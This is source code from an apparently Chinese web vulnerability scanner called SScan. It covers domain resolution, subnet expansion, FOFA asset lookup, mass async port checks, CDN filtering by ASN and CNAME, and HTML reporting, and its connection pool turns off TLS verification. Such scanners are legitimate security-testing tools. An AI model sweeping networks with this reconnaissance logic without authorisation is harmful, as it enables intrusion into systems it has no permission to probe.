117 | scheme = task.result()[3]
118 | path = task.result()[4]
119 | if host in targets:
120 | port = targets[host]['ports_open']
121 | port.append(task.result()[1])
122 | targets[host].update(ports_open=port)
123 | else:
124 | targets[host] = {'scheme': scheme, 'host': host, 'port': task.result()[5], 'path': path, 'ports_open': [task.result()[1]]}
125 |
126 | # 处理 fofa 的结果
127 | for _target in fofa_result:
128 | url = _target
129 | # scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
130 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
131 |
132 | # 指定端口时需要,检查指定的端口是否开放
133 | host = netloc.split(':')[0]
134 | port = int(netloc.split(':')[1])
135 | if host in targets.keys() and (port == 80 or port == 443):
136 | pass
137 | else:
138 | fofa_target = {'scheme': scheme, 'host': netloc, 'port': port, 'path': path, 'ports_open': [port]}
139 | targets[netloc] = fofa_target
140 |
141 | return targets
142 |
143 |
144 | # 使用异步协程, 检测目标80、443、给定端口是否开放
145 | def process_targets(queue_targets, q_targets, args, fofa_result):
146 |
147 | sem = asyncio.Semaphore(1000) # 限制并发量
148 | # 主线程通过 get_event_loop 获取当前事件循环, 对于其他线程需要首先loop=new_event_loop(),然后set_event_loop(loop)。
149 | loop = asyncio.new_event_loop()
150 | asyncio.set_event_loop(loop)
151 |
152 | # 对目标和要扫描的端口做处理,格式化
153 |
154 | # queue_targets ['http://127.0.0.1:8080', 'www.baidu.cn']
155 | # ip_port_list [('127.0.0.1', 8080, 0, 'http', ''), ('www.baidu.cn', 80, 0, 'unknown', ''), ('www.baidu.cn', 443, 0, 'unknown', '')]
156 | ip_port_list = get_ip_port_list(queue_targets, args)
157 |
158 | tasks = list()
159 |
160 | progress = Progress(
161 | "[progress.description]{task.description}",
162 | BarColumn(),
163 | "[progress.percentage]{task.percentage:>3.0f}%",
164 | TimeRemainingColumn(),
165 | "[bold red]{task.completed}/{task.total}",
166 | transient=True, # 100%后隐藏进度条
167 | )
168 |
169 | # 进度条
170 | with progress:
171 | task = progress.add_task(f"[cyan]Start of port detection ...", total=len(queue_targets), start=False)
172 | try:
173 | for ip_port in ip_port_list:
174 | # 端口扫描任务
175 | tasks.append(loop.create_task(port_scan_check(ip_port, sem, progress, task)))
176 | except Exception as e:
177 | logger.log("ERROR", f'{e}')
178 |
179 | import platform
180 | if platform.system() != "Windows":
181 | import uvloop
182 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
183 | loop.run_until_complete(asyncio.wait(tasks))
184 | # 关闭事件循环
185 | loop.close()
186 |
187 | # 对目标进行封装,格式化
188 | targets = get_target(tasks, fofa_result)
189 |
190 | for host in targets:
191 | target = targets[host]
192 | ports_open = target['ports_open']
193 | if 80 in ports_open and 443 in ports_open:
194 | target.update(port=443)
195 | target.update(scheme='https')
196 |
197 | elif 80 in ports_open:
198 | target.update(port=80)
199 | target.update(scheme='http')
200 | elif 443 in ports_open:
201 | target.update(port=443)
202 | target.update(scheme='https')
203 |
204 | if target['port'] in ports_open or 80 in ports_open or 443 in ports_open:
205 | target['has_http'] = True
206 | else:
207 | target['has_http'] = False
208 | # 添加目标,最终的扫描目标
209 | # {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [443, 80], 'has_http': True}
210 | q_targets.put(target)
211 |
212 | logger.log("DEBUG", f'扫描目标详细信息: {target}')
213 |
214 |
215 | # 解析域名获取ip,检查域名有效性 ,并保存有效url和ip
216 | async def domain_lookup_check(loop, url, queue_targets, processed_targets):
217 | # 将 ['https://jd.com'] 转换为 [('jd.com', 'https')]
218 | url = url.replace('\n', '').replace('\r', '').strip()
219 | if url.find('://') < 0:
220 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
221 | scheme = 'http'
222 | else:
223 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
224 | # host port
225 | if netloc.find(':') >= 0:
226 | _ = netloc.split(':')
227 | host = _[0]
228 | else:
229 | host = netloc
230 |
231 | # ('jd.com', 'https')
232 | url_tuple = (host, scheme)
233 | try:
234 | info = await loop.getaddrinfo(*url_tuple, proto=socket.IPPROTO_TCP,)
235 | queue_targets.append(url)
236 | for host in info:
237 | ip = host[4][0]
238 | # 只存IP, 为指定掩码做准备
239 | processed_targets.append(ip)
240 | except Exception as e:
241 | logger.log("ERROR", f'Invalid domain: {url}')
242 | pass
243 |
244 |
245 | # 预处理 URL / IP / 域名,端口发现
246 | def prepare_targets(target_list, q_targets, args):
247 | # 有效目标,包括url和ip
248 | queue_targets = []
249 |
250 | # 有效ip, 当指定其它掩码时,根据该ip添加目标
251 | processed_targets = []
252 |
253 | # 解析域名获取ip, 使用异步协程处理, 7000 有效 url ,解析ip大约 20s
254 | loop = asyncio.get_event_loop()
255 | tasks = [loop.create_task(domain_lookup_check(loop, url, queue_targets, processed_targets)) for url in target_list]
256 | # 使用uvloop加速asyncio, 目前不支持Windows
257 | import platform
258 | if platform.system() != "Windows":
259 | import uvloop
260 | asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
261 | result = asyncio.gather(*tasks)
262 |
263 | loop.run_until_complete(result)
264 |
265 | loop.close()
266 |
267 | logger.log("DEBUG", f'有效域名url: {queue_targets} 和 有效ip: {processed_targets}')
268 |
269 | # 对目标ip进行进一步处理, 检查是否存在cdn
270 | if args.checkcdn:
271 | processed_targets = check_cdn(target_list)
272 |
273 | logger.log("DEBUG", f'没有CDN的目标: {processed_targets}')
274 |
275 | # 当指定子网掩码时的处理逻辑, 将对应网段ip加入处理目标中
276 | if args.network != 32:
277 | for ip in processed_targets:
278 | if ip.find('/') > 0: # 网络本身已经处理过 118.193.98/24
279 | continue
280 | _network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
281 | if _network in processed_targets:
282 | continue
283 | processed_targets.append(_network)
284 | if args.network >= 20:
285 | sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
286 | else:
287 | sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
288 |
289 | for sub_net in sub_nets:
290 | if sub_net in processed_targets:
291 | continue
292 | if type(sub_net) == ipaddress.IPv4Network: # add network only
293 | processed_targets.append(str(sub_net))
294 | for _ip in sub_net:
295 | _ip = str(_ip)
296 | if _ip not in processed_targets:
297 | queue_targets.append(_ip)
298 |
299 | # 目标列表 将域名和IP 合并
300 | queue_targets.extend(processed_targets)
301 | # 去重
302 | queue_targets = set(queue_targets)
303 |
304 | # fofa 扫到的并且存活的web资产
305 | fofa_result = []
306 |
307 | # 当配置 fofa api 时, 对 queue_targets 目标进行fofa搜索,扩大资产范围
308 | if fofaApi['email'] and fofaApi['key']:
309 | fofa_result = fmain(queue_targets)
310 | # fofa_result['http://127.0.0.1:3790', 'http://127.0.0.1:80', 'https://127.0.0.1:443']
311 |
312 | # 使用异步协程, 检测目标80、443、给定端口是否开放
313 | # 检测目标的80、443、给定端口是否开放,并格式化,加入扫描队列 q_targets
314 | process_targets(queue_targets, q_targets, args, fofa_result)
315 |
--------------------------------------------------------------------------------
/lib/common/connectionPool.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import requests
6 | from requests.adapters import HTTPAdapter
7 | from config import setting
8 | '''
9 | 连接池
10 | HTTP是建立在TCP上面的,一次HTTP请求要经历TCP三次握手阶段,
11 | 然后发送请求,得到相应,最后TCP断开连接。如果我们要发出多个HTTP请求,
12 | 每次都这么搞,那每次要握手、请求、断开,就太浪费了,如果是HTTPS请求,就更加浪费了,
13 | 每次HTTPS请求之前的连接多好几个包(不包括ACK的话会多4个)。
14 | 所以如果我们在TCP或HTTP连接建立之后,可以传输、传输、传输,就能省很多资源。
15 | 于是就有了“HTTP(S)连接池”的概念。
16 | '''
17 |
18 |
19 | def conn_pool():
20 | session = requests.Session()
21 | session.keep_alive = False
22 | session.headers = setting.default_headers
23 | # 创建一个适配器,连接池的数量pool_connections, 最大数量pool_maxsize, 失败重试的次数max_retries
24 | '''
25 | pool_connections – 缓存连接 缓存的 urllib3 连接池个数, 指定的不是连接的数量,而是连接池的数量,一般默认的10就够用了。
26 | pool_maxsize – 指定的才是每个pool中最大连接数量
27 | max_retries (int) – 每次连接的最大失败重试次数,只用于 DNS 查询失败,socket 连接或连接超时,
28 | 默认情况下
29 | Requests 不会重试失败的连接,如果你需要对请求重试的条件进行细粒度的控制,可以引入 urllib3 的 Retry 类
30 | pool_block – 连接池是否应该为连接阻塞
31 | '''
32 |
33 | adapter = HTTPAdapter(pool_connections=10, pool_maxsize=100, pool_block=False)
34 | # 告诉requests,http协议和https协议都使用这个适配器
35 | session.mount('http://', adapter)
36 | session.mount('https://', adapter)
37 | # 设置为False, 主要是HTTPS时会报错
38 | session.verify = False
39 |
40 | # user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'
41 | # user_agent = default_headers
42 |
43 | return session
44 |
--------------------------------------------------------------------------------
/lib/common/consle_width.py:
--------------------------------------------------------------------------------
1 | """ getTerminalSize()
2 | - get width and height of console
3 | - works on linux,os x,windows,cygwin(windows)
4 | """
5 |
6 | __all__ = ['getTerminalSize']
7 | import os
8 |
9 |
10 | def getTerminalSize():
11 | import platform
12 | current_os = platform.system()
13 | tuple_xy = None
14 | if current_os == 'Windows':
15 | tuple_xy = _getTerminalSize_windows()
16 | if tuple_xy is None:
17 | tuple_xy = _getTerminalSize_tput()
18 | # needed for window's python in cygwin's xterm!
19 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
20 | tuple_xy = _getTerminalSize_linux()
21 | if tuple_xy is None:
22 | tuple_xy = (80, 25) # default value
23 | return tuple_xy
24 |
25 |
26 | def _getTerminalSize_windows():
27 | res = None
28 | try:
29 | from ctypes import windll, create_string_buffer
30 |
31 | # stdin handle is -10
32 | # stdout handle is -11
33 | # stderr handle is -12
34 |
35 | h = windll.kernel32.GetStdHandle(-12)
36 | csbi = create_string_buffer(22)
37 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
38 | except:
39 | return None
40 | if res:
41 | import struct
42 | (bufx, bufy, curx, cury, wattr,
43 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
44 | sizex = right - left + 1
45 | sizey = bottom - top + 1
46 | return sizex, sizey
47 | else:
48 | return None
49 |
50 |
51 | def _getTerminalSize_tput():
52 | # get terminal width
53 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
54 | try:
55 | import subprocess
56 | proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
57 | output = proc.communicate(input=None)
58 | cols = int(output[0])
59 | proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
60 | output = proc.communicate(input=None)
61 | rows = int(output[0])
62 | return (cols, rows)
63 | except:
64 | return None
65 |
66 |
67 | def _getTerminalSize_linux():
68 | def ioctl_GWINSZ(fd):
69 | try:
70 | import fcntl, termios, struct, os
71 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
72 | except:
73 | return None
74 | return cr
75 |
76 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
77 | if not cr:
78 | try:
79 | fd = os.open(os.ctermid(), os.O_RDONLY)
80 | cr = ioctl_GWINSZ(fd)
81 | os.close(fd)
82 | except:
83 | pass
84 | if not cr:
85 | try:
86 | env = os.environ
87 | cr = (env['LINES'], env['COLUMNS'])
88 | except:
89 | return None
90 | return int(cr[1]), int(cr[0])
91 |
92 |
93 | if __name__ == "__main__":
94 | sizex, sizey = getTerminalSize()
95 | print('width =', sizex, 'height =', sizey)
96 |
97 |
98 |
--------------------------------------------------------------------------------
/lib/common/report.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | # report template
3 |
4 | import time
5 | from string import Template
6 | import webbrowser
7 | import sys
8 | import errno
9 | import codecs
10 | import os
11 | from lib.common.utils import escape
12 | from lib.common.consle_width import getTerminalSize
13 | from config import setting
14 | from config.log import logger
15 | from config.banner import version
16 | # template for html
17 |
18 | html_general = """
19 |
20 |
21 | SScan ${version} Scan Report
22 |
23 |
35 |
36 |
37 | Scanned ${tasks_processed_count} targets in
38 | ${cost_min} ${cost_seconds} seconds .
39 | ${vulnerable_hosts_count} vulnerable hosts found in total.
40 | ${content}
41 |
42 |
43 | """
44 |
45 | html_host = """
46 | ${host}
47 |
50 | """
51 |
52 | html_list_item = """
53 | ${status} ${vul_type} ${title} ${url}
54 | """
55 |
56 | html = {
57 | 'general': html_general,
58 | 'host': html_host,
59 | 'list_item': html_list_item,
60 | 'suffix': '.html'
61 | }
62 |
63 |
64 | # template for markdown
65 | markdown_general = """
66 | # BBScan Scan Report
67 | Version: v 1.5
68 | Num of targets: ${tasks_processed_count}
69 | Num of vulnerable hosts: ${vulnerable_hosts_count}
70 | Time cost: ${cost_min} ${cost_seconds} seconds
71 | ${content}
72 | """
73 |
74 | markdown_host = """
75 | ## ${host}
76 | ${list}
77 | """
78 |
79 | markdown_list_item = """* [${status}] ${title} ${url}
80 | """
81 |
82 | markdown = {
83 | 'general': markdown_general,
84 | 'host': markdown_host,
85 | 'list_item': markdown_list_item,
86 | 'suffix': '.md'
87 | }
88 |
89 |
90 | # summary
91 | template = {
92 | 'html': html,
93 | }
94 |
95 |
96 | def save_report(args, _q_results, _file, tasks_processed_count):
97 |
98 | no_browser = args.browser
99 | start_time = time.time()
100 | a_template = template['html']
101 | t_general = Template(a_template['general'])
102 | t_host = Template(a_template['host'])
103 | t_list_item = Template(a_template['list_item'])
104 | output_file_suffix = a_template['suffix']
105 | report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
106 | time.strftime('%Y%m%d_%H%M%S', time.localtime()),
107 | output_file_suffix)
108 |
109 | html_doc = content = ""
110 | vulnerable_hosts_count = 0
111 | console_width = getTerminalSize()[0] - 2
112 |
113 | try:
114 | while not setting.stop_me or _q_results.qsize() > 0:
115 | if _q_results.qsize() == 0:
116 | time.sleep(0.1)
117 | continue
118 |
119 | while _q_results.qsize() > 0:
120 | item = _q_results.get()
121 | if type(item) is str:
122 | message = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), item)
123 | if args.network <= 22 and (item.startswith('Scan ') or item.startswith('No ports open')):
124 | sys.stdout.write(message + (console_width - len(message)) * ' ' + '\r')
125 | else:
126 | logger.log('INFOR', f"{message}")
127 | continue
128 | host, results = item
129 | vulnerable_hosts_count += 1
130 |
131 | # print
132 | for key in results.keys():
133 | for url in results[key]:
134 | logger.log('INFOR', f"[+]{url['status'] if url['status'] else ''} {url['url']}")
135 |
136 | _str = ""
137 | for key in results.keys():
138 | for _ in results[key]:
139 | _str += t_list_item.substitute(
140 | {'status': ' [%s]' % _['status'] if _['status'] else '',
141 | 'url': _['url'],
142 | 'title': '[%s]' % _['title'] if _['title'] else '',
143 | 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
144 | )
145 | _str = t_host.substitute({'host': host, 'list': _str})
146 | content += _str
147 |
148 | cost_time = time.time() - start_time
149 | cost_min = int(cost_time / 60)
150 | cost_min = '%s min' % cost_min if cost_min > 0 else ''
151 | cost_seconds = '%.2f' % (cost_time % 60)
152 |
153 | html_doc = t_general.substitute({
154 | 'version': version,
155 | 'tasks_processed_count': tasks_processed_count,
156 | 'vulnerable_hosts_count': vulnerable_hosts_count,
157 | 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content
158 | })
159 |
160 | with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
161 | outFile.write(html_doc)
162 |
163 | # if config.ports_saved_to_file:
164 | # print('* Ports data saved to %s' % args.save_ports)
165 |
166 | if html_doc:
167 |
168 | cost_time = time.time() - start_time
169 | cost_min = int(cost_time / 60)
170 | cost_min = '%s min' % cost_min if cost_min > 0 else ''
171 | cost_seconds = '%.1f' % (cost_time % 60)
172 |
173 | html_doc = t_general.substitute({
174 | 'version': version,
175 | 'tasks_processed_count': tasks_processed_count,
176 | 'vulnerable_hosts_count': vulnerable_hosts_count,
177 | 'cost_min': cost_min,
178 | 'cost_seconds': cost_seconds,
179 | 'content': content
180 | })
181 |
182 | with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
183 | outFile.write(html_doc)
184 |
185 | time.sleep(1.0)
186 |
187 | logger.log('INFOR', '* %s vulnerable targets on sites in total.' % vulnerable_hosts_count)
188 | logger.log('INFOR', '* Scan report saved to report/%s' % report_name)
189 | if no_browser:
190 | webbrowser.open_new_tab('file:///' + os.path.abspath('report/%s' % report_name))
191 | else:
192 | logger.log('INFOR', '* No vulnerabilities found on sites in %s.' % _file)
193 |
194 | except IOError as e:
195 | if e.errno == errno.EPIPE:
196 | sys.exit(-1)
197 | except Exception as e:
198 | logger.log('ERROR', '[save_report_thread Exception] %s %s' % (type(e), str(e)))
199 | import traceback
200 | traceback.print_exc()
201 | sys.exit(-1)
202 |
--------------------------------------------------------------------------------
/lib/common/utils.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 | import re
5 | import json
6 | from ipaddress import IPv4Address
7 | from urllib.parse import urlparse
8 | import hashlib
9 | from config.log import logger
10 | from config.setting import fofaApi, default_headers
11 | import requests
12 | import sys
13 |
14 |
15 | # ctrl c 退出时,屏幕上不输出丑陋的traceback信息
16 | def ctrl_quit(_sig, _frame):
17 | sys.exit()
18 |
19 |
20 | def check_fofa():
21 | # 当配置 fofa api 时, 检查api是否可用
22 | if fofaApi['email'] and fofaApi['key']:
23 | email = fofaApi['email']
24 | key = fofaApi['key']
25 | url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
26 | try:
27 | status = requests.get(url, headers=default_headers, timeout=10, verify=False).status_code
28 | if status != 200:
29 | logger.log('ALERT', f'请修改配置文件config/setting.py中fofaApi为您的API地址')
30 | exit(-1)
31 | except requests.exceptions.ReadTimeout as e:
32 | logger.log('ERROR', f'请求超时 {e}')
33 | exit(-1)
34 | except requests.exceptions.ConnectionError as e:
35 | logger.log('ERROR', f'网络超时 {e}')
36 | exit(-1)
37 |
38 |
39 | def ip_to_int(ip):
40 | if isinstance(ip, int):
41 | return ip
42 | try:
43 | ipv4 = IPv4Address(ip)
44 | except Exception as e:
45 | logger.log('ERROR', repr(e))
46 | return 0
47 | return int(ipv4)
48 |
49 |
50 | def load_json(path):
51 | with open(path) as fp:
52 | return json.load(fp)
53 |
54 |
55 | def clear_queue(this_queue):
56 | try:
57 | while True:
58 | this_queue.get_nowait()
59 | except Exception as e:
60 | return
61 |
62 |
63 | # 计算页面的 md5 值 ,通过对比 md5 值 ,判断页面是否相等
64 | def get_md5(resp, headers):
65 | html_doc = get_html(headers, resp)
66 | return hashlib.md5(html_doc.encode('utf-8')).hexdigest()
67 |
68 |
69 | def get_html(headers, resp):
70 | if headers.get('content-type', '').find('text') >= 0 \
71 | or headers.get('content-type', '').find('html') >= 0 \
72 | or int(headers.get('content-length', '0')) <= 20480: # 1024 * 20
73 | # 解决中文乱码
74 | html_doc = decode_response_text(resp.content)
75 | else:
76 | html_doc = ''
77 | return html_doc
78 |
79 |
80 | # 解决中文乱码
81 | def decode_response_text(txt, charset=None):
82 | if charset:
83 | try:
84 | return txt.decode(charset)
85 | except Exception as e:
86 | pass
87 | for _ in ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']:
88 | try:
89 | return txt.decode(_)
90 | except Exception as e:
91 | pass
92 | try:
93 | return txt.decode('ascii', 'ignore')
94 | except Exception as e:
95 | pass
96 | raise Exception('Fail to decode response Text')
97 |
98 |
99 | def get_domain_sub(host):
100 | if re.search(r'\d+\.\d+\.\d+\.\d+', host.split(':')[0]):
101 | return ''
102 | else:
103 | return host.split('.')[0]
104 |
105 |
106 | def save_script_result(self, status, url, title, vul_type=''):
107 | if url not in self.results:
108 | self.results[url] = []
109 | _ = {'status': status, 'url': url, 'title': title, 'vul_type': vul_type}
110 |
111 | self.results[url].append(_)
112 |
113 |
114 | def escape(html):
115 | return html.replace('&', '&').\
116 | replace('<', '<').replace('>', '>').\
117 | replace('"', '"').replace("'", ''')
118 |
119 |
120 | # 探测端口是否开放
121 | # host: www.baidu.com 或者 ip
122 | # def is_port_open(host, port):
123 | # try:
124 | # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
125 | # s.settimeout(3.0)
126 | # if s.connect_ex((host, int(port))) == 0:
127 | # return True
128 | # else:
129 | # return False
130 | # except Exception as e:
131 | # logger.log('ERROR', f'{repr(e)}')
132 | # return False
133 | # finally:
134 | # try:
135 | # # 关闭 TCP 连接
136 | # s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
137 | # s.close()
138 | # except Exception as e:
139 | # pass
140 |
141 | # def scan_given_ports(confirmed_open, confirmed_closed, host, ports):
142 | # checked_ports = confirmed_open.union(confirmed_closed)
143 | # ports_open = set()
144 | # ports_closed = set()
145 | #
146 | # for port in ports:
147 | # if port in checked_ports: # 不重复检测已确认端口
148 | # continue
149 | # if is_port_open(host, port):
150 | # ports_open.add(port)
151 | # else:
152 | # ports_closed.add(port)
153 | #
154 | # return ports_open.union(confirmed_open), ports_closed.union(confirmed_closed)
155 |
156 |
157 | # 计算给定URL的深度,返回元组(URL, depth)
158 | def cal_depth(self, url):
159 | if url.find('#') >= 0:
160 | url = url[:url.find('#')] # cut off fragment
161 | if url.find('?') >= 0:
162 | url = url[:url.find('?')] # cut off query string
163 |
164 | # 当存在一下三种情况时,判断不是当前超链不是当前域名,或者没有http服务,则不加入队列
165 | if url.startswith('//'):
166 | return '', 10000 # //www.baidu.com/index.php
167 |
168 | if not urlparse(url, 'http').scheme.startswith('http'):
169 | return '', 10000 # no HTTP protocol
170 |
171 | if url.lower().startswith('http'):
172 | _ = urlparse(url, 'http')
173 | if _.netloc == self.host: # same hostname
174 | url = _.path
175 | else:
176 | return '', 10000 # not the same hostname
177 |
178 | while url.find('//') >= 0:
179 | url = url.replace('//', '/')
180 |
181 | if not url:
182 | return '/', 1 # http://www.example.com
183 |
184 | if url[0] != '/':
185 | url = '/' + url
186 |
187 | url = url[: url.rfind('/') + 1]
188 |
189 | if url.split('/')[-2].find('.') > 0:
190 | url = '/'.join(url.split('/')[:-2]) + '/'
191 |
192 | depth = url.count('/')
193 | return url, depth
194 |
195 |
196 | # # 将 ['https://jd.com'] 转换为 [('jd.com', 'https')]
197 | # def format_url(urls):
198 | #
199 | # format_url = []
200 | # for url in urls:
201 | # url = url.replace('\n', '').replace('\r', '').strip()
202 | # if url.find('://') < 0:
203 | # netloc = url[:url.find('/')] if url.find('/') > 0 else url
204 | # scheme = 'http'
205 | # else:
206 | # scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
207 | # # host port
208 | # if netloc.find(':') >= 0:
209 | # _ = netloc.split(':')
210 | # host = _[0]
211 | # else:
212 | # host = netloc
213 | # url_tuple = (url, scheme)
214 | # format_url.append(url_tuple)
215 | # print(format_url)
216 | # return format_url
217 |
--------------------------------------------------------------------------------
/lib/data/GeoLite2-ASN.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/lib/data/GeoLite2-ASN.mmdb
--------------------------------------------------------------------------------
/lib/data/cdn_asn_list.json:
--------------------------------------------------------------------------------
1 | [
2 | "10576",
3 | "10762",
4 | "11748",
5 | "131099",
6 | "132601",
7 | "133496",
8 | "134409",
9 | "135295",
10 | "136764",
11 | "137187",
12 | "13777",
13 | "13890",
14 | "14103",
15 | "14520",
16 | "17132",
17 | "199251",
18 | "200013",
19 | "200325",
20 | "200856",
21 | "201263",
22 | "202294",
23 | "203075",
24 | "203139",
25 | "204248",
26 | "204286",
27 | "204545",
28 | "206227",
29 | "206734",
30 | "206848",
31 | "206986",
32 | "207158",
33 | "208559",
34 | "209403",
35 | "21030",
36 | "21257",
37 | "23327",
38 | "23393",
39 | "23637",
40 | "23794",
41 | "24997",
42 | "26492",
43 | "268843",
44 | "28709",
45 | "29264",
46 | "30282",
47 | "30637",
48 | "328126",
49 | "36408",
50 | "38107",
51 | "397192",
52 | "40366",
53 | "43303",
54 | "44907",
55 | "46071",
56 | "46177",
57 | "47542",
58 | "49287",
59 | "49689",
60 | "51286",
61 | "55082",
62 | "55254",
63 | "56636",
64 | "57363",
65 | "58127",
66 | "59730",
67 | "59776",
68 | "60068",
69 | "60626",
70 | "60922",
71 | "61107",
72 | "61159",
73 | "62026",
74 | "62229",
75 | "63062",
76 | "64232",
77 | "8868",
78 | "9053",
79 | "55770",
80 | "49846",
81 | "49249",
82 | "48163",
83 | "45700",
84 | "43639",
85 | "39836",
86 | "393560",
87 | "393234",
88 | "36183",
89 | "35994",
90 | "35993",
91 | "35204",
92 | "34850",
93 | "34164",
94 | "33905",
95 | "32787",
96 | "31377",
97 | "31110",
98 | "31109",
99 | "31108",
100 | "31107",
101 | "30675",
102 | "24319",
103 | "23903",
104 | "23455",
105 | "23454",
106 | "22207",
107 | "21399",
108 | "21357",
109 | "21342",
110 | "20940",
111 | "20189",
112 | "18717",
113 | "18680",
114 | "17334",
115 | "16702",
116 | "16625",
117 | "12222",
118 | "209101",
119 | "201585",
120 | "135429",
121 | "395747",
122 | "394536",
123 | "209242",
124 | "203898",
125 | "202623",
126 | "14789",
127 | "133877",
128 | "13335",
129 | "132892",
130 | "21859",
131 | "6185",
132 | "47823",
133 | "4134"
134 | ]
--------------------------------------------------------------------------------
/lib/data/cdn_cname_keywords.json:
--------------------------------------------------------------------------------
1 | {
2 | "cdn": "cdn",
3 | "cache": "cache",
4 | "tbcache.com": "Alibaba Cloud",
5 | "alicdn.com": "Alibaba Cloud",
6 | "tcdn.qq.com": "tcdn.qq.com",
7 | "00cdn.com": "XYcdn",
8 | "21cvcdn.com": "21Vianet",
9 | "21okglb.cn": "21Vianet",
10 | "21speedcdn.com": "21Vianet",
11 | "21vianet.com.cn": "21Vianet",
12 | "21vokglb.cn": "21Vianet",
13 | "360wzb.com": "360",
14 | "51cdn.com": "ChinaCache",
15 | "acadn.com": "Dnion",
16 | "aicdn.com": "UPYUN",
17 | "akadns.net": "Akamai",
18 | "akamai-staging.net": "Akamai",
19 | "akamai.com": "Akamai",
20 | "akamai.net": "Akamai",
21 | "akamaitech.net": "Akamai",
22 | "akamaized.net": "Akamai",
23 | "alicloudlayer.com": "ALiyun",
24 | "alikunlun.com": "ALiyun",
25 | "aliyun-inc.com": "ALiyun",
26 | "alicloudsec.com": "ALiyun",
27 | "aliyuncs.com": "ALiyun",
28 | "amazonaws.com": "Amazon Cloudfront",
29 | "anankecdn.com.br": "Ananke",
30 | "aodianyun.com": "VOD",
31 | "aqb.so": "AnQuanBao",
32 | "awsdns": "KeyCDN",
33 | "azioncdn.net": "Azion",
34 | "azureedge.net": "Azure CDN",
35 | "bdydns.com": "Baiduyun",
36 | "bitgravity.com": "Tata Communications",
37 | "cachecn.com": "CnKuai",
38 | "cachefly.net": "Cachefly",
39 | "ccgslb.com": "ChinaCache",
40 | "ccgslb.net": "ChinaCache",
41 | "ccgslb.com.cn": "ChinaCache",
42 | "cdn-cdn.net": "",
43 | "cdn.cloudflare.net": "CloudFlare",
44 | "cdn.dnsv1.com": "Tengxunyun",
45 | "cdn.ngenix.net": "",
46 | "cdn20.com": "ChinaCache",
47 | "cdn77.net": "CDN77",
48 | "cdn77.org": "CDN77",
49 | "cdnetworks.net": "CDNetworks",
50 | "cdnify.io": "CDNify",
51 | "cdnnetworks.com": "CDNetworks",
52 | "cdnsun.net": "CDNsun",
53 | "cdntip.com": "QCloud",
54 | "cdnudns.com": "PowerLeader",
55 | "cdnvideo.ru": "CDNvideo",
56 | "cdnzz.net": "SuZhi",
57 | "chinacache.net": "ChinaCache",
58 | "chinaidns.net": "LineFuture",
59 | "chinanetcenter.com": "ChinaCache",
60 | "cloudcdn.net": "CnKuai",
61 | "cloudfront.net": "Amazon Cloudfront",
62 | "customcdn.cn": "ChinaCache",
63 | "customcdn.com": "ChinaCache",
64 | "dnion.com": "Dnion",
65 | "dnspao.com": "",
66 | "edgecastcdn.net": "EdgeCast",
67 | "edgesuite.net": "Akamai",
68 | "ewcache.com": "Dnion",
69 | "fastcache.com": "FastCache",
70 | "fastcdn.cn": "Dnion",
71 | "fastly.net": "Fastly",
72 | "fastweb.com": "CnKuai",
73 | "fastwebcdn.com": "CnKuai",
74 | "footprint.net": "Level3",
75 | "fpbns.net": "Level3",
76 | "fwcdn.com": "CnKuai",
77 | "fwdns.net": "CnKuai",
78 | "globalcdn.cn": "Dnion",
79 | "hacdn.net": "CnKuai",
80 | "hadns.net": "CnKuai",
81 | "hichina.com": "WWW",
82 | "hichina.net": "WWW",
83 | "hwcdn.net": "Highwinds",
84 | "incapdns.net": "Incapsula",
85 | "internapcdn.net": "Internap",
86 | "jiashule.com": "Jiasule",
87 | "kunlun.com": "ALiyun",
88 | "kunlunar.com": "ALiyun",
89 | "kunlunca.com": "ALiyun",
90 | "kxcdn.com": "KeyCDN",
91 | "lswcdn.net": "Leaseweb",
92 | "lxcdn.com": "ChinaCache",
93 | "mwcloudcdn.com": "QUANTIL",
94 | "netdna-cdn.com": "MaxCDN",
95 | "okcdn.com": "21Vianet",
96 | "okglb.com": "21Vianet",
97 | "ourwebcdn.net": "ChinaCache",
